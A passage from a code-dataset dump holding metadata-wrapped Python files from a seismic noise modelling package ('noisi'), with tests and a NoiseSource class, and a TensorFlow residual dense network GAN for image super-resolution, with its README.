(scaled)')\nplt.savefig(os.path.join(sourcepath,'freq_distr_startingmodel.png'))\n\n\n# Save to an hdf5 file\n\nwith h5py.File(os.path.join(sourcepath,'step_0','starting_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float32))\n fh.create_dataset('frequencies',data=freq.astype(np.float32))\n fh.create_dataset('distr_basis',data=basis1.astype(np.float32))\n fh.create_dataset('distr_weights',data=weights1.astype(np.float32))\n fh.create_dataset('spect_basis',data=basis2.astype(np.float32))\n\n\n# Save the 'base model' to an hdf5 file.\n\nbasis1_b = np.ones(basis1.shape)\nweights1_b = np.ones(weights1.shape)\nwith h5py.File(os.path.join(sourcepath,'step_0','base_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float32))\n fh.create_dataset('frequencies',data=freq.astype(np.float32))\n fh.create_dataset('distr_basis',data=basis1_b.astype(np.float32))\n fh.create_dataset('distr_weights',data=weights1_b.astype(np.float32))\n fh.create_dataset('spect_basis',data=basis2.astype(np.float32))\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6634066700935364,
"alphanum_fraction": 0.6862265467643738,
"avg_line_length": 39.900001525878906,
"blob_id": "819680d3a8b9d5c83fa816689004ab02e29f86a8",
"content_id": "51776cdff4e070e9eec521096d7acef2f7f3e25a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1227,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 30,
"path": "/noisi/test/test_kernel.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\n\ndef test_kernel():\n # copy the correlation\n if os.path.exists('test/testdata/testsrc/step_0/adjt'):\n os.system('rm -rf test/testdata/testsrc/step_0/adjt/')\n os.mkdir('test/testdata/testsrc/step_0/adjt')\n os.mkdir('test/testdata/testsrc/step_0/kern')\n os.system('cp test/testdata/testsrc/step_0/adjt_archived/*.sac \\\n test/testdata/testsrc/step_0/adjt/')\n os.system('cp -r test/testdata/testsrc/wavefield_processed_archived\\\n test/testdata/testsrc/wavefield_processed')\n\n os.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5\\\n test/testdata/testsrc/step_0/base_model.h5')\n\n # run forward model\n os.system('noisi kernel test/testdata/testsrc/ 0')\n\n # assert the results are the same\n # ToDo: path\n k1 = np.load('test/testdata/testsrc/step_0/kern/NET.STA1..CHA--NET.STA2..CHA.0.npy')\n k2 = np.load('test/testdata/testsrc/step_0/kern_archived/NET.STA1..CHA--NET.STA2..CHA.npy')\n assert ((k1-k2)/k1).max() < 1.e-06\n\n # remove stuff\n os.system('rm -rf test/testdata/testsrc/step_0/adjt/')\n os.system('rm -rf test/testdata/testsrc/step_0/kern/')\n os.system('rm -rf test/testdata/testsrc/wavefield_processed')\n"
},
{
"alpha_fraction": 0.5996432304382324,
"alphanum_fraction": 0.6024464964866638,
"avg_line_length": 34.96330261230469,
"blob_id": "319d00b6067f89558e483963fe0af506f1cbff17",
"content_id": "407f434bb88621bb9e0914acc740bec0c68686bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3924,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 109,
"path": "/noisi/my_classes/noisesource.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport h5py\n\nfrom scipy.stats import linregress\nimport os\ntry:\n from noisi.util.plot import plot_grid\nexcept ImportError:\n print('Plotting unavailable, is basemap installed?')\n\nfrom noisi.util.geo import get_spherical_surface_elements\n\nclass NoiseSource(object):\n \"\"\"\n 'model' of the noise source that comes in terms of a couple of basis \n functions and associated weights. The NoiseSource object should contain a \n function to determine weights from a (kernel? source model?), and to expand from weights and basis \n functions.\n \n \"\"\"\n \n \n def __init__(self,model,w='r'):\n \n # Model is an hdf5 file which contains the basis and weights of the source model!\n \n \n try:\n self.model = h5py.File(model,w)\n self.src_loc = self.model['coordinates']\n self.freq = self.model['frequencies']\n \n # Presumably, these arrays are small and will be used very often --> good to have in memory.\n self.distr_basis = self.model['distr_basis'][:]\n self.spect_basis = self.model['spect_basis'][:]\n self.distr_weights = self.model['distr_weights'][:]\n\n # The surface area of each grid element...new since June 18\n try:\n self.surf_area = self.model['surf_areas'][:]\n except KeyError:\n # approximate as spherical surface elements...\n self.surf_area = get_spherical_surface_elements(\n self.src_loc[0],self.src_loc[1])\n np.save('surface_areas_grid.npy',self.surf_area)\n \n self.spatial_source_model = self.expand_distr()\n \n except IOError:\n msg = 'Unable to open model file '+model\n raise IOError(msg)\n\n\n \n def __enter__(self):\n return self\n \n def __exit__(self,type,value,traceback):\n \n if self.model is not None:\n self.model.close()\n #ToDo: Check what parameters/data should be written before file closed\n\n def project_gridded(self):\n pass\n\n def expand_distr(self):\n expand = np.dot(self.distr_weights,self.distr_basis)\n \n return np.array(expand,ndmin=2)\n\n\n def get_spect(self,iloc):\n # return one spectrum in location with index iloc\n # The reason this function is for one spectrum only is that the entire gridded matrix of spectra by location is most probably pretty big.\n \n\n weights = self.spatial_source_model[:,iloc]#np.array(self.expand_distr()[:,iloc])\n \n \n return np.dot(weights, self.spect_basis)\n \n \n def plot(self,**options):\n \n # plot the distribution\n \n for m in self.spatial_source_model: \n plot_grid(self.src_loc[0],self.src_loc[1],m,**options)\n\n\n \n # Note: Inefficient way of doing things! Whichever script needs the noise source field should rather look up things directly in the hdf5 file.\n # But: ToDo: This could be used internally to write to a file, rather than reading from.\n # Although: A problem to think about: noise source should behave the same, whether it is defined by model or by file. So maybe, since model will be the default option anyway, work with this!\n #def get_spectrum(self,iloc):\n # # Return the source spectrum at location nr. iloc\n # \n # #if self.file is not None:\n # # return self.sourcedistr[iloc] * self.spectra[iloc,:]\n # if self.model is not None:\n # return self.spectr.\n # # (Expand from basis fct. in model)\n #def get_sourcedistr(self,i):\n # # Return the spatial distribution of max. PSD\n # if self.file is not None:\n # return np.multiply(self.sourcedistr[:],self.spectra[:,i])\n # else:\n # raise NotImplementedError\n \n"
},
{
"alpha_fraction": 0.7168331146240234,
"alphanum_fraction": 0.7410841584205627,
"avg_line_length": 37.94444274902344,
"blob_id": "463f78f83d3b4a0d1ef27ee66ba7a685707c0deb",
"content_id": "cea46442bff9d013085b40a9342c946facfae9d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1402,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 36,
"path": "/noisi/test/test_update.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nfrom noisi import NoiseSource\n\ndef test_update():\n\t# copy data\n\tos.mkdir('test/testdata/testsrc/step_0/corr')\n\tos.mkdir('test/testdata/testsrc/step_0/grad')\n\t\n\tos.system('cp test/testdata/testsrc/step_0/corr_archived/NET.STA1..CHA--NET.STA2..CHA.sac \\\n\t\ttest/testdata/testsrc/step_0/corr/NET.STA1..CHA--NET.STA2..CHA.sac')\n\n\tos.system('cp test/testdata/testsrc/step_0/grad_archived/grad_all.npy\\\n\t\ttest/testdata/testsrc/step_0/grad/grad_all.npy')\n\tos.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5\\\n\t\ttest/testdata/testsrc/step_0/starting_model.h5')\n\tos.system('cp test/testdata/testsrc/step_0/ln_energy_ratio.measurement_archived.csv\\\n\t\ttest/testdata/testsrc/step_0/ln_energy_ratio.0.measurement.csv')\n\t\n\n\t# run forward model\n\tos.system('./test/testdata/testsrc/update.sh')\n\n\t# assert the results are the same\n\t# ToDo: path\n\tn1 = NoiseSource('test/testdata/testsrc/step_1_archived/starting_model.h5')\n\tn2 = NoiseSource('test/testdata/testsrc/step_1/starting_model.h5')\n\n\tassert (n1.distr_basis == n2.distr_basis).sum() == len(n1.distr_basis[0,:])\n\t\n\t\n\t# remove stuff\n\tos.system('rm -rf test/testdata/testsrc/step_0/grad')\n\tos.system('rm -rf test/testdata/testsrc/step_0/corr')\n\tos.system('rm -rf test/testdata/testsrc/step_1')\n\tos.system('rm test/testdata/testsrc/step_0/starting_model.h5')\n\tos.system('rm test/testdata/testsrc/step_0/ln_energy_ratio.0.measurement.csv')\n"
},
{
"alpha_fraction": 0.7120000123977661,
"alphanum_fraction": 0.7120000123977661,
"avg_line_length": 23.799999237060547,
"blob_id": "58a55094fd33812ba83dfe90858703dd3f72012d",
"content_id": "a1651778d582cbc409c4bc4d6f3b6502a3871bb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 125,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 5,
"path": "/noisi/test/test_setup.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\n\ndef test_setup():\n os.system('noisi setup_project testtesttesttest')\n os.system('rm -rf testtesttesttest')\n\n"
},
{
"alpha_fraction": 0.6978764533996582,
"alphanum_fraction": 0.7080115675926208,
"avg_line_length": 43.085105895996094,
"blob_id": "cca842d8aa4853ebbeb55a77f955eba0e5f49af5",
"content_id": "a59c72ce138f805b900becc6a40742bf885329f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2072,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 47,
"path": "/noisi/util/voronoi_surface_area.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nfrom noisi.borrowed_functions.voronoi_polygons import getVoronoiCollection\nfrom noisi.borrowed_functions.voronoi_surface_area import calculate_surface_area_of_a_spherical_Voronoi_polygon\nfrom noisi.borrowed_functions.voronoi_polygons import xyzToSpherical\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef get_voronoi_surface_area(grd):\n \"\"\"\n Computes the spherical voronoi cells and calculates their surface areas.\n Input: grid with longitude and latitude \n Output: grid (since the order might change) and voronoi surface areas corresponding to each point\n \n Functions from:\n https://github.com/tylerjereddy/spherical-SA-docker-demo/blob/master/docker_build/demonstration.py\n https://github.com/MITHaystack/scikit-discovery/blob/master/skdiscovery/visualization/spherical_voronoi.py#L40\n \"\"\"\n # convert grid into panda dataframe\n gridpd = {'lat': grd[1], 'lon': grd[0]}\n grid_data = pd.DataFrame(data=gridpd)\n \n # Calculate the vertices for the voronoi cells\n voronoi = getVoronoiCollection(data=grid_data,lat_name='lat',lon_name='lon',full_sphere=True)\n \n # Calculate the surface area for each voronoi cell\n voronoi_lat = []\n voronoi_lon = []\n voronoi_area = []\n \n for i in range(0,np.size(voronoi.points,0)):\n P_cart = xyzToSpherical(x=voronoi.points[i,0],y=voronoi.points[i,1],z=voronoi.points[i,2])\n voronoi_lat.append(P_cart[0])\n voronoi_lon.append(P_cart[1])\n vert_points = voronoi.vertices[voronoi.regions[i]]\n area = calculate_surface_area_of_a_spherical_Voronoi_polygon(vert_points,6371)\n voronoi_area.append(area)\n if i%1000 == 0:\n print('%g of %g voronoi cell surface areas calculated.' %(i,np.size(voronoi.points,0)),flush=True)\n \n # Reassign grd so that everything is in the right order\n grd = np.asarray([voronoi_lon,voronoi_lat])\n voronoi_area = np.asarray(voronoi_area)\n print('All voronoi cell surface areas calculated.')\n \n return grd, voronoi_area\n"
}
] | 51 |
MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution
|
https://github.com/MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution
|
c5055134367c23e05986b2a15cfd091a2e10155b
|
425f2613e0520a2588703d5d40dc5a2df2f3f1c0
|
06d2bd1f8e10677caa4b3c4e986a5afd93455b03
|
refs/heads/master
| 2021-07-17T20:25:41.864345 | 2020-06-05T07:53:33 | 2020-06-05T07:53:33 | 162,711,378 | 26 | 3 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5573596358299255,
"alphanum_fraction": 0.5761760473251343,
"avg_line_length": 39.92356872558594,
"blob_id": "3d9f37d1f2ee5581c567fa5584f9d43fae075f17",
"content_id": "0653ca2e9737e33f857f7ddc075e6c641e076b5c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6590,
"license_type": "permissive",
"max_line_length": 133,
"num_lines": 157,
"path": "/ops.py",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\r\n\r\n\r\n\r\ndef batchnorm(x, train_phase, scope_bn):\r\n #Batch Normalization\r\n #Ioffe S, Szegedy C. Batch normalization: accelerating deep network training by reducing internal covariate shift[J]. 2015:448-456.\r\n with tf.variable_scope(scope_bn):\r\n beta = tf.get_variable(name=scope_bn + 'beta', shape=[x.shape[-1]],\r\n initializer=tf.constant_initializer([0.]), trainable=True) # label_nums x C\r\n gamma = tf.get_variable(name=scope_bn + 'gamma', shape=[x.shape[-1]],\r\n initializer=tf.constant_initializer([1.]), trainable=True) # label_nums x C\r\n batch_mean, batch_var = tf.nn.moments(x, [0, 1, 2], name='moments')\r\n ema = tf.train.ExponentialMovingAverage(decay=0.5)\r\n\r\n def mean_var_with_update():\r\n ema_apply_op = ema.apply([batch_mean, batch_var])\r\n with tf.control_dependencies([ema_apply_op]):\r\n return tf.identity(batch_mean), tf.identity(batch_var)\r\n\r\n mean, var = tf.cond(train_phase, mean_var_with_update,\r\n lambda: (ema.average(batch_mean), ema.average(batch_var)))\r\n normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)\r\n return normed\r\n\r\n\r\ndef _l2normalize(v, eps=1e-12):\r\n return v / tf.sqrt(tf.reduce_sum(tf.square(v)) + eps)\r\n\r\n\r\ndef max_singular_value(W, u, Ip=1):\r\n _u = u\r\n _v = 0\r\n for _ in range(Ip):\r\n _v = _l2normalize(tf.matmul(_u, W), eps=1e-12)\r\n _u = _l2normalize(tf.matmul(_v, W, transpose_b=True), eps=1e-12)\r\n _v = tf.stop_gradient(_v)\r\n _u = tf.stop_gradient(_u)\r\n sigma = tf.reduce_sum(tf.matmul(_u, W) * _v)\r\n return sigma, _u, _v\r\n\r\ndef spectral_normalization(name, W, Ip=1):\r\n u = tf.get_variable(name + \"_u\", [1, W.shape[-1]], initializer=tf.random_normal_initializer(), trainable=False) # 1 x ch\r\n W_mat = tf.transpose(tf.reshape(W, [-1, W.shape[-1]]))\r\n sigma, _u, _ = max_singular_value(W_mat, u, Ip)\r\n with tf.control_dependencies([tf.assign(u, _u)]):\r\n W_sn = W / sigma\r\n return W_sn\r\n\r\n\r\ndef conv(name, inputs, k_size, nums_out, strides, is_sn=False):\r\n nums_in = int(inputs.shape[-1])\r\n kernel = tf.get_variable(name+\"W\", [k_size, k_size, nums_in, nums_out], initializer=tf.truncated_normal_initializer(stddev=0.02))\r\n bias = tf.get_variable(name+\"B\", [nums_out], initializer=tf.constant_initializer(0.))\r\n if is_sn:\r\n return tf.nn.conv2d(inputs, spectral_normalization(name, kernel), [1, strides, strides, 1], \"SAME\") + bias\r\n else:\r\n return tf.nn.conv2d(inputs, kernel, [1, strides, strides, 1], \"SAME\") + bias\r\n\r\ndef relu(inputs):\r\n return tf.nn.relu(inputs)\r\n\r\ndef leaky_relu(inputs, slope=0.2):\r\n return tf.maximum(inputs, slope * inputs)\r\n\r\ndef RDB(name, inputs, C_nums, G, G_0):\r\n #Paper: Figure 3.\r\n with tf.variable_scope(\"RDB_\"+name):\r\n temp = tf.identity(inputs)\r\n for i in range(C_nums):\r\n x = conv(\"conv1_\" + str(i), inputs, 3, G, 1)\r\n x = relu(x)\r\n inputs = tf.concat([inputs, x], axis=-1)\r\n inputs = conv(\"conv\", inputs, 1, G_0, 1)\r\n inputs = temp + inputs\r\n return inputs\r\n\r\ndef Upscale(inputs, factor):\r\n B = tf.shape(inputs)[0]\r\n H = tf.shape(inputs)[1]\r\n W = tf.shape(inputs)[2]\r\n nums_in = int(inputs.shape[-1])\r\n nums_out = nums_in // factor ** 2\r\n inputs = tf.split(inputs, num_or_size_splits=nums_out, axis=-1)\r\n output = 0\r\n for idx, split in enumerate(inputs):\r\n temp = tf.reshape(split, [B, H, W, factor, factor])\r\n temp = tf.transpose(temp, perm=[0, 1, 4, 2, 3])\r\n temp = tf.reshape(temp, [B, H * factor, W * factor, 1])\r\n if idx == 0:\r\n output = temp\r\n else:\r\n output = tf.concat([output, temp], axis=-1)\r\n return output\r\n\r\ndef Linear(name, inputs, nums_in, nums_out, is_sn=True):\r\n W = tf.get_variable(\"W_\" + name, [nums_in, nums_out], initializer=tf.truncated_normal_initializer(stddev=0.02))\r\n b = tf.get_variable(\"B_\" + name, [nums_out], initializer=tf.constant_initializer([0.]))\r\n if is_sn:\r\n return tf.matmul(inputs, spectral_normalization(name, W)) + b\r\n else:\r\n return tf.matmul(inputs, W) + b\r\n\r\ndef avg_pool(inputs, k_size=3, strides=2, padding=\"SAME\"):\r\n return tf.nn.avg_pool(inputs, [1, k_size, k_size, 1], [1, strides, strides, 1], padding)\r\n\r\ndef ResBlock(name, inputs, k_size, nums_out, is_down=True):\r\n #inputs: B x H x W x C_in\r\n with tf.variable_scope(name):\r\n temp = inputs\r\n inputs = relu(inputs)\r\n inputs = conv(\"conv1\", inputs, k_size, nums_out, 1, True) # inputs: B x H/2 x W/2 x C_out\r\n inputs = relu(inputs)\r\n inputs = conv(\"conv2\", inputs, k_size, nums_out, 1, True) # inputs: B x H/2 x W/2 x C_out\r\n if is_down:\r\n inputs = avg_pool(inputs)\r\n down_sampling = conv(\"down_sampling_\" + name, temp, 1, nums_out, 1, True) # down_sampling: B x H x W x C_out\r\n down_sampling = avg_pool(down_sampling)\r\n outputs = inputs + down_sampling\r\n else:\r\n outputs = inputs + temp\r\n return outputs\r\n\r\ndef ResBlock0(name, inputs, k_size, nums_out, is_down=True):\r\n #inputs: B x H x W x C_in\r\n with tf.variable_scope(name):\r\n temp = inputs\r\n inputs = conv(\"conv1\", inputs, k_size, nums_out, 1, True) # inputs: B x H/2 x W/2 x C_out\r\n inputs = relu(inputs)\r\n inputs = conv(\"conv2\", inputs, k_size, nums_out, 1, True) # inputs: B x H/2 x W/2 x C_out\r\n inputs = relu(inputs)\r\n if is_down:\r\n inputs = avg_pool(inputs)\r\n down_sampling = conv(\"down_sampling_\" + name, temp, 1, nums_out, 1, True) # down_sampling: B x H x W x C_out\r\n down_sampling = avg_pool(down_sampling)\r\n outputs = inputs + down_sampling\r\n else:\r\n outputs = inputs + temp\r\n return outputs\r\n\r\ndef Inner_product(inputs, y):\r\n with tf.variable_scope(\"IP\"):\r\n inputs = conv(\"conv\", inputs, 3, 3, 1, True)\r\n inputs = tf.reduce_sum(inputs * y, axis=[1, 2, 3])\r\n return inputs\r\n\r\ndef global_sum_pooling(inputs):\r\n return tf.reduce_sum(inputs, axis=[1, 2])\r\n\r\ndef Hinge_Loss(fake_logits, real_logits):\r\n D_loss = tf.reduce_mean(tf.maximum(0., 1 - real_logits)) + \\\r\n tf.reduce_mean(tf.maximum(0., 1 + fake_logits))\r\n G_loss = -tf.reduce_mean(fake_logits)\r\n return D_loss, G_loss\r\n\r\ndef MSE(a, b):\r\n return tf.reduce_mean(tf.reduce_sum(tf.abs(a - b), axis=[1, 2, 3]))\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.47505518794059753,
"alphanum_fraction": 0.5236203074455261,
"avg_line_length": 39.94444274902344,
"blob_id": "d36c8fde8e28306440d1daf8126e6234a680bea2",
"content_id": "74506f5e05cc8d4dd7df41705953fe2565ba2f66",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2265,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 54,
"path": "/networks.py",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "from ops import *\r\n\r\nclass Generator:\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n def __call__(self, inputs, G_0=64, G=32, D=20, C_nums=6):\r\n #Section 5.3 for configuration\r\n #Grouth rate: G_0, G, The number of RDB: D\r\n with tf.variable_scope(self.name):\r\n inputs = relu(conv(\"conv1\", inputs, 3, G_0, 1))\r\n F_1 = tf.identity(inputs)\r\n inputs = relu(conv(\"conv2\", inputs, 3, G_0, 1))\r\n\r\n inputs = RDB(\"0\", inputs, C_nums=C_nums, G=G, G_0=G_0)\r\n temp = tf.identity(inputs)\r\n for i in range(1, D):\r\n inputs = RDB(str(i), inputs, C_nums=C_nums, G=G, G_0=G_0)\r\n temp = tf.concat([inputs, temp], axis=-1)\r\n inputs = relu(conv(\"conv3\", temp, 1, G_0, 1))\r\n F_GF = relu(conv(\"conv4\", inputs, 3, G_0, 1))\r\n F_DF = F_GF + F_1\r\n inputs = Upscale(F_DF, 2)\r\n inputs = relu(conv(\"Up_conv1\", inputs, 3, G, 1))\r\n inputs = Upscale(inputs, 2)\r\n inputs = conv(\"Up_conv2\", inputs, 3, 3, 1)\r\n return tf.nn.tanh(inputs)\r\n\r\n def var_list(self):\r\n return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)\r\n\r\nclass Discriminator:\r\n def __init__(self, name):\r\n self.name = name\r\n\r\n def __call__(self, inputs, y):\r\n with tf.variable_scope(self.name, reuse=tf.AUTO_REUSE):\r\n inputs = ResBlock0(\"Res1\", inputs, 3, 64)\r\n inputs = ResBlock(\"Res2\", inputs, 3, 64, False)\r\n inputs = ResBlock(\"Res3\", inputs, 3, 128)\r\n inputs = ResBlock(\"Res4\", inputs, 3, 128, False)\r\n x = Inner_product(inputs, y)\r\n inputs = ResBlock(\"Res5\", inputs, 3, 128)\r\n inputs = ResBlock(\"Res6\", inputs, 3, 256)#256\r\n inputs = ResBlock(\"Res7\", inputs, 3, 512)#512\r\n inputs = ResBlock(\"Res8\", inputs, 3, 1024)#1024\r\n inputs = ResBlock(\"Res9\", inputs, 3, 1024, False)#1024\r\n inputs = relu(inputs)\r\n inputs = global_sum_pooling(inputs)\r\n inputs = Linear(\"Linear\", inputs, 1024, 1) + x\r\n return inputs\r\n\r\n def var_list(self):\r\n return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)\r\n"
},
{
"alpha_fraction": 0.5846905708312988,
"alphanum_fraction": 0.6131922006607056,
"avg_line_length": 41.08771896362305,
"blob_id": "1b29e59ff2f1a1bbd7c80c8a39460a8a93086e81",
"content_id": "4815ee4cde0acbfe169e7380e760d3e9fe6a02ad",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2456,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 57,
"path": "/Train.py",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "from networks import Generator, Discriminator\r\nfrom ops import Hinge_Loss, MSE\r\nimport tensorflow as tf\r\nfrom utils import read_crop_data\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\n#Paper: CGANS WITH PROJECTION DISCRIMINATOR\r\n#Paper: Residual Dense Network for Image Super-Resolution\r\n\r\nBATCH_SIZE = 16\r\nMAX_ITERATION = 600000\r\nTRAINING_SET_PATH = \"./TrainingSet/\"\r\nLAMBDA = 100\r\nSAVE_MODEL = \"./save_para/\"\r\nRESULTS = \"./results/\"\r\n\r\n\r\n\r\ndef train():\r\n RDN = Generator(\"RDN\")\r\n D = Discriminator(\"discriminator\")\r\n HR = tf.placeholder(tf.float32, [None, 96, 96, 3])\r\n LR = tf.placeholder(tf.float32, [None, 24, 24, 3])\r\n SR = RDN(LR)\r\n fake_logits = D(SR, LR)\r\n real_logits = D(HR, LR)\r\n D_loss, G_loss = Hinge_Loss(fake_logits, real_logits)\r\n G_loss += MSE(SR, HR) * LAMBDA\r\n itr = tf.Variable(MAX_ITERATION, dtype=tf.int32, trainable=False)\r\n learning_rate = tf.Variable(2e-4, trainable=False)\r\n op_sub = tf.assign_sub(itr, 1)\r\n D_opt = tf.train.AdamOptimizer(learning_rate, beta1=0., beta2=0.9).minimize(D_loss, var_list=D.var_list())\r\n with tf.control_dependencies([op_sub]):\r\n G_opt = tf.train.AdamOptimizer(learning_rate, beta1=0., beta2=0.9).minimize(G_loss, var_list=RDN.var_list())\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n lr0 = 2e-4\r\n saver = tf.train.Saver()\r\n while True:\r\n HR_data, LR_data = read_crop_data(TRAINING_SET_PATH, BATCH_SIZE, [96, 96, 3], 4)\r\n sess.run(D_opt, feed_dict={HR: HR_data, LR: LR_data})\r\n [_, iteration] = sess.run([G_opt, itr], feed_dict={HR: HR_data, LR: LR_data})\r\n iteration_ = iteration*1.0\r\n iteration = MAX_ITERATION - iteration\r\n if iteration > MAX_ITERATION // 2:\r\n learning_rate_ = lr0 * (iteration_ * 2 / MAX_ITERATION)\r\n sess.run(tf.assign(learning_rate, learning_rate_))\r\n if iteration % 10 == 0:\r\n [D_LOSS, G_LOSS, LEARNING_RATE, img] = sess.run([D_loss, G_loss, learning_rate, SR], feed_dict={HR: HR_data, LR: LR_data})\r\n output = (np.concatenate((HR_data[0, :, :, :], img[0, :, :, :]), axis=1) + 1) * 127.5\r\n Image.fromarray(np.uint8(output)).save(RESULTS+str(iteration)+\".jpg\")\r\n print(\"Iteration: %d, D_loss: %f, G_loss: %f, LearningRate: %f\"%(iteration, D_LOSS, G_LOSS, LEARNING_RATE))\r\n if iteration % 500 == 0:\r\n saver.save(sess, SAVE_MODEL + \"model.ckpt\")\r\n\r\ntrain()\r\n"
},
{
"alpha_fraction": 0.5222830176353455,
"alphanum_fraction": 0.541829526424408,
"avg_line_length": 35.55882263183594,
"blob_id": "5c15e8d044c66921885bedd61d4e189a5cbc8e29",
"content_id": "489cc421824d16ae4dbae6a944fb890fe44caa6e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1279,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 34,
"path": "/utils.py",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport scipy.misc as misc\r\nfrom PIL import Image\r\nimport os\r\n\r\n\r\n\r\ndef read_crop_data(path, batch_size, shape, factor):\r\n h = shape[0]\r\n w = shape[1]\r\n c = shape[2]\r\n filenames = os.listdir(path)\r\n rand_selects = np.random.randint(0, filenames.__len__(), [batch_size])\r\n batch = np.zeros([batch_size, h, w, c])\r\n downsampled = np.zeros([batch_size, h//factor, w//factor, c])\r\n for idx, select in enumerate(rand_selects):\r\n try:\r\n img = np.array(Image.open(path + filenames[select]))[:, :, :3]\r\n crop = random_crop(img, h)\r\n batch[idx, :, :, :] = crop\r\n downsampled[idx, :, :, :] = misc.imresize(crop, [h // factor, w // factor])\r\n except:\r\n img = np.array(Image.open(path + filenames[0]))[:, :, :3]\r\n crop = random_crop(img, h)\r\n batch[idx, :, :, :] = crop\r\n downsampled[idx, :, :, :] = misc.imresize(crop, [h//factor, w//factor])\r\n return batch/127.5 - 1.0, downsampled / 127.5 - 1.0\r\n\r\ndef random_crop(img, size):\r\n h = img.shape[0]\r\n w = img.shape[1]\r\n start_x = np.random.randint(0, h - size + 1)\r\n start_y = np.random.randint(0, w - size + 1)\r\n return img[start_x:start_x + size, start_y:start_y + size, :]\r\n\r\n"
},
{
"alpha_fraction": 0.7723857164382935,
"alphanum_fraction": 0.7839699387550354,
"avg_line_length": 117.22222137451172,
"blob_id": "842f3d7562f0a692fbcafd87658f0d9b7acbb452",
"content_id": "98eb9ee30b6bb06288f5e816cdf2f210fe193a0e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3194,
"license_type": "permissive",
"max_line_length": 386,
"num_lines": 27,
"path": "/README.md",
"repo_name": "MingtaoGuo/Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution",
"src_encoding": "UTF-8",
"text": "# Residual-Dense-Network-Trained-with-cGAN-for-Super-Resolution\nThis repository is as a research project in the field of super resolution. It uses RDN as the generator and spectral norm is used in discriminator.\n\n# Introduction\n### This is a trial for super-resolution\nThe residual dense network has many advantages for reconstructing SR images, and we use GANs to enhance RDN.\nThe core idea is from the following two papers:\n1. Residual Dense Network for Image Super-Resolution\n2. cGANs with projection discriminator\n##### Generator: Residual Dense Network\n\n##### Discriminator: cGAN projection\n\n# Results\nThese results is just trained about 200,000 iterations (full: 600,000) with batch size of 16. \n\n|Raw|Bicubic(x4)|RDN_GAN(x4)|\n|-|-|-|\n||||\n||||\n||||\n||||\n||||\n# Reference \n[1] Zhang Y, Tian Y, Kong Y, et al. Residual dense network for image super-resolution[C]//The IEEE Conference on Computer Vision and Pattern Recognition (CVPR). 2018.\n\n[2] Miyato T, Koyama M. cGANs with projection discriminator[J]. arXiv preprint arXiv:1802.05637, 2018.\n\n\n"
}
] | 5 |
xikun2020/TAPS
|
https://github.com/xikun2020/TAPS
|
068affea464b2a4796df0b2ef031c80e72dc92d7
|
b84f719fed06b13fdc15db4741f3d41e87f6777e
|
ae113327db2dc57edf201ffa630a641cfe64de7b
|
refs/heads/master
| 2023-07-26T09:01:49.362262 | 2023-07-06T02:43:34 | 2023-07-06T02:43:34 | 372,518,986 | 5 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5445557832717896,
"alphanum_fraction": 0.5519817471504211,
"avg_line_length": 46.896217346191406,
"blob_id": "e045f54b21169b226d174fa450ff521c85c15386",
"content_id": "e9a3f7d99d1bab2ee08e72fb5e714263f19e7f37",
"detected_licenses": [],
"is_generated": false,
